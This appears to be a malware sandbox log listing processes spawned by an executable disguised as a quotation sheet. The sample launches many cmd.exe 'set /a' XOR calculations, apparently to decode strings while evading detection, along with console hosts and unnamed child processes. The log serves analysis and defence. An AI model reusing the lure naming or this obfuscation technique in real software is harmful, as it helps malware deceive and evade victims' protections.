Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
